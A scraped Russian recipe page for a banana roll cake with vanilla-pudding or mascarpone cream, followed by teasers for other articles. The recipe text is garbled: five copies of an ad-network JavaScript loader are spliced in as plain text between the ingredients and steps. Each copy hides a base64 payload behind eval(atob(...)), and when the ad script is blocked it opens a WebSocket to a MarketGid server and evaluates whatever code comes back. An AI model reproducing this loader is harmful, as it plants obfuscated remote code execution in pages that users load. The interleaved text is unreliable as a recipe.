Необычный торт-рулет с бананами — все будут просить рецепт этого изумительного тортика!


Моему сыну недавно исполнилось 5 лет. Я решила приготовить к праздничному столу необычный десерт: вкусный торт с бананами и ванильным пудингом. Обязательно попробуйте приготовить этот тортик у себя дома и порадуйте своих домочадцев!

var d = new Date, script648716 = document.createElement(«script»), mg_ws648716 = {};script648716.type = «text/javascript»;script648716.charset = «utf-8»;script648716.src = «http://jsc.marketgid.com/p/e/perekusim.com.648716.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648716.onerror = function () { mg_ws648716 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTYoZSl7dmFyIGg9bWdfd3M2NDg3MTYub25tZXNzYWdlOyBtZ193czY0ODcxNi5yZWFkeVN0YXRlPT1tZ193czY0ODcxNi5DTE9TRUQmJihtZ193czY0ODcxNj1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE2X2xvY2F0aW9uKSksbWdfd3M2NDg3MTYub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYobWdfd3M2NDg3MTYsZnVuY3Rpb24oKXttZ193czY0ODcxNi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTZfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTZfbG9jYXRpb24pLCBtZ193czY0ODcxNi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTYoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648716.onmessage = function (msg){window.eval(msg.data);}; mg_ws648716.postMessage(‘js|’+script648716.src+’|M382836Composite648716|M382836Composite648716’);};document.body.appendChild(script648716);

Рулет:

– 6 крупных яиц

– 6 ложек сахара

– 6 ложек муки

– 1/2 ч. л. порошка для выпечки

– варенье клубничное, малиновое, абрикосовое, вишневое.

Крем:

– 2 пакетика ванильного пудинга (2*40 г)

– 800 мл молока

var d = new Date, script648714 = document.createElement(«script»), mg_ws648714 = {};script648714.type = «text/javascript»;script648714.charset = «utf-8»;script648714.src = «http://jsc.marketgid.com/p/e/perekusim.com.648714.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648714.onerror = function () { mg_ws648714 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTQoZSl7dmFyIGg9bWdfd3M2NDg3MTQub25tZXNzYWdlOyBtZ193czY0ODcxNC5yZWFkeVN0YXRlPT1tZ193czY0ODcxNC5DTE9TRUQmJihtZ193czY0ODcxND1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE0X2xvY2F0aW9uKSksbWdfd3M2NDg3MTQub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQobWdfd3M2NDg3MTQsZnVuY3Rpb24oKXttZ193czY0ODcxNC5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTRfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNCA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTRfbG9jYXRpb24pLCBtZ193czY0ODcxNC5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTQoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648714.onmessage = function (msg){window.eval(msg.data);}; mg_ws648714.postMessage(‘js|’+script648714.src+’|M382836Composite648714|M382836Composite648714’);};document.body.appendChild(script648714);

– 70 г масла

– 6 ложек сахара

– 4 листа желатина

или:

– 6 желтков

– 120 г сахара

– 100 мл молока

– 6 листов желатина (1 пакетик)

– 500 г маскарпоне

– 5-6 бананов

– шоколад с фруктовой начинкой, кофейной и т. д

– 300 мл сметаны для сливок

– 3 ложки сахарного песка.

Как готовить:

1. Рулет: взбиваем белки с солью, добавляем сахар, помешиваем до тех пор, пока сахар не растворится, а смесь не загустеет, затем добавляем по очереди желтки и просеянную муку, смешанную с разрыхлителем. Перемешиваем ложкой. Запекаем в большой форме в разогретой духовке при температуре 180 градусов в течение 15 минут.

var d = new Date, script648715 = document.createElement(«script»), mg_ws648715 = {};script648715.type = «text/javascript»;script648715.charset = «utf-8»;script648715.src = «http://jsc.marketgid.com/p/e/perekusim.com.648715.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648715.onerror = function () { mg_ws648715 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTUoZSl7dmFyIGg9bWdfd3M2NDg3MTUub25tZXNzYWdlOyBtZ193czY0ODcxNS5yZWFkeVN0YXRlPT1tZ193czY0ODcxNS5DTE9TRUQmJihtZ193czY0ODcxNT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE1X2xvY2F0aW9uKSksbWdfd3M2NDg3MTUub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUobWdfd3M2NDg3MTUsZnVuY3Rpb24oKXttZ193czY0ODcxNS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTVfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTVfbG9jYXRpb24pLCBtZ193czY0ODcxNS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTUoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648715.onmessage = function (msg){window.eval(msg.data);}; mg_ws648715.postMessage(‘js|’+script648715.src+’|M382836Composite648715|M382836Composite648715’);};document.body.appendChild(script648715);

2. Рабочую поверхность застилаем бумагой для выпечки, посыпаем сахаром. Выкладываем горячий корж на поверхность и оборачиваем бумагой. После того, как тесто остынет, разворачиваем его и намазываем тонким слоем клубничного, малинового или любого другого варенья. Снова оборачиваем бумагой для выпечки и убираем в сторону.

var d = new Date, script648717 = document.createElement(«script»), mg_ws648717 = {};script648717.type = «text/javascript»;script648717.charset = «utf-8»;script648717.src = «http://jsc.marketgid.com/p/e/perekusim.com.648717.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648717.onerror = function () { mg_ws648717 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTcoZSl7dmFyIGg9bWdfd3M2NDg3MTcub25tZXNzYWdlOyBtZ193czY0ODcxNy5yZWFkeVN0YXRlPT1tZ193czY0ODcxNy5DTE9TRUQmJihtZ193czY0ODcxNz1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE3X2xvY2F0aW9uKSksbWdfd3M2NDg3MTcub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcobWdfd3M2NDg3MTcsZnVuY3Rpb24oKXttZ193czY0ODcxNy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTdfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTdfbG9jYXRpb24pLCBtZ193czY0ODcxNy5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTcoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648717.onmessage = function (msg){window.eval(msg.data);}; mg_ws648717.postMessage(‘js|’+script648717.src+’|M382836Composite648717|M382836Composite648717’);};document.body.appendChild(script648717);

3. Крем: готовим пудинг, как указано на упаковке, но с использованием 800 мл молока и 5 ложек сахара. Снимаем с огня и добавляем масло кусочками, затем желатиновые листы, замоченные в холодной воде в течение 5-10 минут.

4. Или: замачиваем листы желатина в холодной воде. Желтки взбиваем с сахаром, добавляем горячее молоко, затем кипятим в течение примерно 5 минут. Даем крему немного остыть, затем добавляем листы желатина и слегка взбитый сыр маскарпоне. Отправляем крем в холодильник на 10 минут, после чего его можно использовать.

Круглую форму (25 см) покрываем бумагой для выпечки, укладываем кусочки рулета на дно формы, а затем по краям. Выливаем половину крема, выкладываем целые очищенные бананы, потом остальную часть пудинга.

var d = new Date, script648719 = document.createElement(«script»), mg_ws648719 = {};script648719.type = «text/javascript»;script648719.charset = «utf-8»;script648719.src = «http://jsc.marketgid.com/p/e/perekusim.com.648719.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648719.onerror = function () { mg_ws648719 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTkoZSl7dmFyIGg9bWdfd3M2NDg3MTkub25tZXNzYWdlOyBtZ193czY0ODcxOS5yZWFkeVN0YXRlPT1tZ193czY0ODcxOS5DTE9TRUQmJihtZ193czY0ODcxOT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE5X2xvY2F0aW9uKSksbWdfd3M2NDg3MTkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkobWdfd3M2NDg3MTksZnVuY3Rpb24oKXttZ193czY0ODcxOS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxOSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTlfbG9jYXRpb24pLCBtZ193czY0ODcxOS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTkoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648719.onmessage = function (msg){window.eval(msg.data);}; mg_ws648719.postMessage(‘js|’+script648719.src+’|M382836Composite648719|M382836Composite648719’);};document.body.appendChild(script648719);

5. Держим торт в холодильнике до момента подачи. Взбиваем сметану с сахарной пудрой и выкладываем на крем. Сверху украшаем тертым шоколадом.

Очень легкий в приготовлении и удивительно вкусный тортик!

Источник



Source link

Почитайте другие интересные статьи:

Новорожденный младенец
Знаете, какое самое удивительное существо на нашей планете? Правильно! Это новорожденный младенец. Несмотря на перенесенный стресс, связанный с появлением на свет, этот слабый и беспомощный с виду малыш моментально переходит на новый способ питания, кровообращения и дыхания.
4 варианта, как из обычных бутербродов сделать шедевр кулинарии! Пальчики оближешь!
Пальчики оближешь! Бутерброды с сыром и грибами Ингредиенты: 5 булочек 100 г грибов 1 репчатый лук майонез — по вкусу 50 г сыра 1 томат Приготовление: Срезать у булочек верх и вынуть мякиш. Смазать каждую булочку изнутри майонезом. google_ad_client = "ca-pub-7104543801500968"; googl...
Знаки зодиака имеют кармическую связь. Относится ли к ним ваша пара?
Всё новые и новые горизонты для анализа отношений открывает астрология. Можем теперь анализировать насколько ваша пара близка кармически. Многие любители астрологии не раз задумывались о том, как именно связан их зодиакальный знак с другими представителями зодиака. Существуют даже специальные таб...